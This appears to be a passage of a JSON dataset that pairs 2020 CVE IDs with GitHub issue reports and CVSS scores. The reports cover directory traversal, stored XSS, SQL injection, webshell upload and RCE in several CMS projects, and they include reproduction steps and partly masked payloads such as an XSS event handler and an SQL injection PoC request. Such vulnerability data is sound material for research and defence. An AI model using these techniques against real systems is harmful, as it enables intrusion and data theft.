        "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25825",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6604",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6604",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-05T22:27:43Z",
        "description": "Bash scripts can reveal sensitive variable values. Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description Bash scripts, when configured in a certain way, can reveal reveal enough information to determine sensitive variable values in task logs. Other script types are not affected. Affected versions Octopus Server NUMBERTAG Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25825",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6607",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6607",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-05T22:34:11Z",
        "description": "Bash scripts can reveal sensitive variable values NUMBERTAG also affected APITAG . The fix has been shipped in the patch indicated by the milestone. If you are using APITAG we highly recommend applying this patch. Learn about Releases of Octopus Deploy Server URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25872",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/34",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/34",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2020-09-14T17:17:47Z",
        "description": "APITAG Directory Traversal Vulnerability. There is a directory traversal vulnerability when logined as a admin and view the uploaded files.An attacker can read arbitrarily file on a remote server via GET request urlencode parameter. APITAG FILETAG . APITAG FILETAG APITAG FILETAG . APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-25873",
        "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/6",
        "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/6",
        "Repo_new": "baijiacms/baijiacmsv4",
        "Issue_Created_At": "2020-09-19T08:11:29Z",
        "description": "APITAG directory traversal vulnerability. Directory traversal vulnerability in APITAG allows remote authenticated attackers to delete arbitrary folders on the server via unspecified vectors. Vulnerable code is in PATHTAG CODETAG The origin request is APITAG ,which is used to delete database backuped folder.We can change the parameter \"id\" to delete any folders. For example NUMBERTAG Create a folder named test FILETAG NUMBERTAG Base NUMBERTAG encode PATHTAG FILETAG NUMBERTAG Change the parameter id to APITAG and request this url \" URLTAG \" FILETAG NUMBERTAG Now the test folder is deleted. FILETAG NUMBERTAG An authenticated attacker can destroy the whole website just use the parameter PATHTAG after base NUMBERTAG encode.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-25875",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/4",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/4",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2020-09-15T04:18:12Z",
        "description": "Cross Site Script Vulnerability on \"UI Elments\" in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click smileys NUMBERTAG Choese smileys >> Click Edit NUMBERTAG Insert Payload APITAG Code': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Chose smiley FILETAG NUMBERTAG insert payload FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25876",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/3",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/3",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2020-09-15T03:10:06Z",
        "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Add Page NUMBERTAG Insert Payload in APITAG Title': '> APITAG NUMBERTAG Click Save NUMBERTAG Go to Page PATHTAG NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Add Pages FILETAG NUMBERTAG ss Message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25877",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/401",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/401",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2020-09-17T04:53:17Z",
        "description": "Cross Site Script Vulnerability on APITAG in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Page\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Page NUMBERTAG Insert Payload in APITAG '> APITAG NUMBERTAG Click APITAG Page NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG insert payload FILETAG NUMBERTAG ss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25878",
        "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/402",
        "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/402",
        "Repo_new": "blackcatdevelopment/blackcatcms",
        "Issue_Created_At": "2020-09-18T01:32:54Z",
        "description": "Cross Site Script Vulnerability on APITAG Tools\" in APITAG CMS NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Tools\" feature in Admin To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Chose: +/ APITAG CMS Output Filters: PATHTAG +/ Droplets: PATHTAG NUMBERTAG Insert Payload '> APITAG \"> APITAG NUMBERTAG Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG APITAG CMS Output Filters: PATHTAG FILETAG FILETAG FILETAG NUMBERTAG Droplets: PATHTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-25879",
        "Issue_Url_old": "https://github.com/r0ck3t1973/xss_payload/issues/5",
        "Issue_Url_new": "https://github.com/r0ck3t1973/xss_payload/issues/5",
        "Repo_new": "r0ck3t1973/xss_payload",
        "Issue_Created_At": "2020-09-22T07:40:45Z",
        "description": "Cross Site Script Vulnerability on APITAG in Codoforum feature NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Users\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the Admin panel NUMBERTAG Go to PATHTAG NUMBERTAG Click Edit Username Insert Payload \"> APITAG NUMBERTAG Click Save NUMBERTAG SS Alert Message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots NUMBERTAG Edit Username FILETAG NUMBERTAG ss alert mess FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-25881",
        "Issue_Url_old": "https://github.com/AubreyJun/cms/issues/2",
        "Issue_Url_new": "https://github.com/aubreyjun/cms/issues/2",
        "Repo_new": "aubreyjun/cms",
        "Issue_Created_At": "2020-09-15T10:19:11Z",
        "description": "There is a directory traversal vulnerability at attachment deletion NUMBERTAG Deploy the RKCMS locally NUMBERTAG Create a file, such as FILETAG FILETAG NUMBERTAG Log in the application NUMBERTAG Delete a attachment\uff0capture this packet ,change the filename parameter to PATHTAG this request FILETAG FILETAG NUMBERTAG FILETAG was deleted FILETAG NUMBERTAG The source code for this function is in FILETAG FILETAG NUMBERTAG filename parameter does not have any filtering FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-25911",
        "Issue_Url_old": "https://github.com/modxcms/revolution/issues/15237",
        "Issue_Url_new": "https://github.com/modxcms/revolution/issues/15237",
        "Repo_new": "modxcms/revolution",
        "Issue_Created_At": "2020-09-16T14:33:59Z",
        "description": "XXE Vulnerability. Firstly, the website of the security vulnerability report does not work, so I have to report the problem here. There is a very serious XXE vulnerability in PATHTAG which could lead to sensitive information leakage or APITAG attack. In function APITAG , the user input is parsed directly without any sanitation. When the content type is APITAG , it will lead to XXE attack. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-25912",
        "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2924",
        "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2924",
        "Repo_new": "symphonycms/symphonycms",
        "Issue_Created_At": "2020-09-21T02:52:43Z",
        "description": "XXE Vulnerability. FILETAG public static function APITAG $xml) { $doc = new APITAG 'utf NUMBERTAG doc APITAG return APITAG $doc); } Crafted user input could lead to XXE vulnerability as the external entity is not disabled here.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26007",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/48",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/48",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2020-09-21T12:31:22Z",
        "description": "There are some vulnerabilities in the upload payment plugin can get webshell. When uploading payment plug ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload In the Upload method in the PATHTAG file, the file_put_contents function parameter is controllable FILETAG But later call APITAG method to do file verification, if the file verification is not passed, the file will be deleted In the APITAG method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class FILETAG According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows: ERRORTAG Finally, the method is called in PATHTAG FILETAG After logging in to the background, upload the zip package containing FILETAG at the site management > payment method > upload FILETAG Visit PATHTAG FILETAG Not by constructing code: The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in PATHTAG FILETAG APITAG is the function of thinkphp to find files. It is mainly loaded through psr NUMBERTAG and classmap. The fully qualified name of the class we passed in is returned by the APITAG function and finally spliced into the complete file path. FILETAG Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation FILETAG At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed. Upload the zip archive containing the php file at the same location, the code content is: APITAG Although the upload failed message is returned after uploading, the code has been included and executed The file is created in FILETAG under the root directory of shopxo installation, visit FILETAG FILETAG There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access. I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing FILETAG The Python script is as follows: APITAG Upload the php file in the compressed package as follows: APITAG The generated php file is in the extend\\payment directory Visit PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26008",
        "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/47",
        "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/47",
        "Repo_new": "gongfuxiang/shopxo",
        "Issue_Created_At": "2020-09-21T11:50:48Z",
        "description": "There is a File upload vulnerability that can getshell. The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways The APITAG method in the PATHTAG file has a file creation operation, in which the input of the file_put_contents function is controllable FILETAG Line NUMBERTAG checks the file suffix name, here is the blacklist check FILETAG The value in the private static variable $exclude_ext is \u2018.php\u2019, which can easily be bypassed FILETAG There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules APITAG The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website Through the audit of the APITAG method in the FILETAG file When the zip archive does not match the resource directory, it will jump out of the loop of reading the archive file FILETAG FILETAG FILETAG And the resource directory cannot be _controller_, because the directory corresponding to _controller_ exists, and the compressed package will be closed directly without entering the subsequent file writing operation FILETAG Finally, the method is called in the Upload method of the PATHTAG file FILETAG The attacker can upload such a compressed package after logging into the background system FILETAG And upload the compressed package at Application Center > Application Management > Upload Application FILETAG Visit PATHTAG FILETAG In PATHTAG there is also the same blacklist verification problem for uploaded files FILETAG The processing logic is very similar to the above file After logging in to the system, upload the zip archive at the site management > theme management > theme installation FILETAG Visit PATHTAG after uploading FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26045",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/575",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/575",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-09-23T07:57:39Z",
        "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. FILETAG payload: a\")or APITAG Poc: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: URLTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Pragma: no cache Cache Control: no cache NUMBERTAG Content Disposition: form data; name=\"description\" adsf NUMBERTAG Content Disposition: form data; name=\"name\" a\")or APITAG NUMBERTAG Content Disposition: form data; name=\"exists_users NUMBERTAG Content Disposition: form data; name=\"other_perms FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26046",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/574",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/574",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-09-23T07:36:11Z",
        "description": "Stored XSS in PATHTAG Variables NUMBERTAG Stored xss in Blocks name FILETAG Refresh the page, it will trigger below APITAG Viewed\" menu FILETAG Front page\uff1a FILETAG payload: \"onmousemove=\"alert NUMBERTAG Stored xss in Navigation Label FILETAG FILETAG payload: APITAG NUMBERTAG Stored xss in Site Variables Name FILETAG FILETAG payload: \"onmousemove=\"alert(/site/)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-26048",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/7",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/7",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2019-11-01T17:33:20Z",
        "description": "Authenticated Remote code Execution. Affected software: APITAG Type of vulnerability: Remote code execution Discovered by: Yosri Debaibi Description: The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file within an image extension (jpg,jpeg,png ..) and through a custom request using the rename function provided by the file manager is able to modify the image extension into php as a result executing php codes . Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the File manager. FILETAG Step3: Upload our malicious php file with image extension in Upload_files. FILETAG Once it is uploaded the file is renamed with APITAG which it is located in PATHTAG as shown in the figure below FILETAG Step4: We launched our proxy to intercept the request then we will rename our file to FILETAG using rename button in the file manager. FILETAG Step5: We deleted the jpg extension from PATHTAG parameter to change our file name to FILETAG and forward the request to the server. FILETAG Step6: We had successfully uploaded our FILETAG in the server. FILETAG we executed our payload by accessing the url below FILETAG PHP code is executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26148",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/130",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/130",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2020-09-29T12:42:58Z",
        "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with Honggfuzz, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26157",
        "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/353",
        "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/353",
        "Repo_new": "leanote/desktop-app",
        "Issue_Created_At": "2020-09-29T10:22:57Z",
        "description": "Two XSS and RCE vulnerabilites through note titles in Leanote Desktop. I have tried to privately report these critical vulnerabilities for more than NUMBERTAG months now. My first report was on June NUMBERTAG Despite multiple follow ups, I have received no response at all and the vulnerabilities still remain. Unfortunately, this leaves public disclosure as my only option. I have found two trivial XSS vulnerabilities in the Leanote Desktop app that can easily be escalated into RCE as Node integration is enabled. Both vulnerabilities can be caused through the title of a note but they are separate issues. Below is the description of the vulnerabilities. Steps to reproduce NUMBERTAG Create a note using the browser with a APITAG element in the title, for example use the following title: APITAG NUMBERTAG To trigger the first vulnerability: Open Leanote Desktop and start syncing for new notes. As soon as the note from step NUMBERTAG is synced, the script will be executed. This can also be triggered by logging in on a new device or by forcing a resync NUMBERTAG To trigger the second vulnerability: Select the note from step NUMBERTAG and another note using the Shift or Ctrl key. While displaying the batch feature, the script is executed NUMBERTAG In both cases, the XSS can trivially be escalated to RCE as Node integration is enabled. This title would open the calculator on Windows for example: APITAG Affected version: Tested using the latest version NUMBERTAG from here: URLTAG Cause and suggested fixes: The first XSS vulnerability is likely caused by this code: URLTAG The title ( APITAG ) needs to be passed through the APITAG function that you have already implemented in both cases. The second XSS vulnerability is caused by this code: URLTAG Here, APITAG also needs to be passed through APITAG . The RCE escalation is caused by Node integration being enabled. This has been discouraged for a while now: URLTAG Severity: Both vulnerabilities can be triggered remotely by an attacker by sharing a note with a user. If a user imports a malicious note shared with them, the vulnerabilities are triggered. Both vulnerabilities allow for executing arbitrary code on the user's computer. This includes deleting files, installing malware, exfiltrating sensitive data, etc. As such, they should be classified as severe. Additional notes: Leanote Desktop uses Electron version NUMBERTAG This very is very old has has numerous publicly known vulnerabilities. I strongly suggest you update to a newer version of Electron and implement the best practices described here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26160",
        "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/422",
        "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/422",
        "Repo_new": "dgrijalva/jwt-go",
        "Issue_Created_At": "2020-07-30T00:20:45Z",
        "description": "Security Vulnerability: failed type assertion leads to bypassing Audience verification. if APITAG happens to be APITAG , as allowed by the spec, the type assertion fails and the value of aud is APITAG . This can cause audience verification to succeed even if the audiences being passed are incorrect if required is set to false . URLTAG ERRORTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26160",
        "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/462",
        "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/462",
        "Repo_new": "dgrijalva/jwt-go",
        "Issue_Created_At": "2021-04-09T18:34:18Z",
        "description": "Migrating Maintenance. See NUMBERTAG I haven't had time to maintain this project for quite a while. I originally made it just for myself, but it appears to have become quite popular. It seems like the best course of action would be to clone this into its own org and then set this repo up to mirror that one until users can fully migrate over. That's probably also a good opportunity to correctly implement go mod support. Does anybody want to take over as maintainer? It looks like APITAG already exists as a github org. Name ideas?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26161",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6622",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6622",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-11T22:50:29Z",
        "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26161",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6627",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6627",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2020-10-13T21:49:42Z",
        "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-26208",
        "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/7",
        "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/7",
        "Repo_new": "matthias-wandel/jhead",
        "Issue_Created_At": "2020-10-22T09:49:38Z",
        "description": "heap buffer overflow on jhead NUMBERTAG APITAG APITAG poc\uff1a CVETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 4.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-26214",
        "Issue_Url_old": "https://github.com/alerta/alerta/issues/1277",
        "Issue_Url_new": "https://github.com/alerta/alerta/issues/1277",
        "Repo_new": "alerta/alerta",
        "Issue_Created_At": "2020-07-27T20:14:49Z",
        "description": "Disallow LDP anonymously bind. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-26235",
        "Issue_Url_old": "https://github.com/time-rs/time/issues/293",
        "Issue_Url_new": "https://github.com/time-rs/time/issues/293",
        "Repo_new": "time-rs/time",
        "Issue_Created_At": "2020-11-10T10:22:10Z",
        "description": "The call to APITAG may be unsound. because getenv and setenv are not thread safe, APITAG in time may compete with APITAG in libstd. I described this problem in chrono issue URLTAG , and time is also affected.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-26238",
        "Issue_Url_old": "https://github.com/jmrozanec/cron-utils/issues/461",
        "Issue_Url_new": "https://github.com/jmrozanec/cron-utils/issues/461",
        "Repo_new": "jmrozanec/cron-utils",
        "Issue_Created_At": "2020-11-21T10:46:17Z",
        "description": "Fix security vulnerability regarding the Hibernate dependency..",
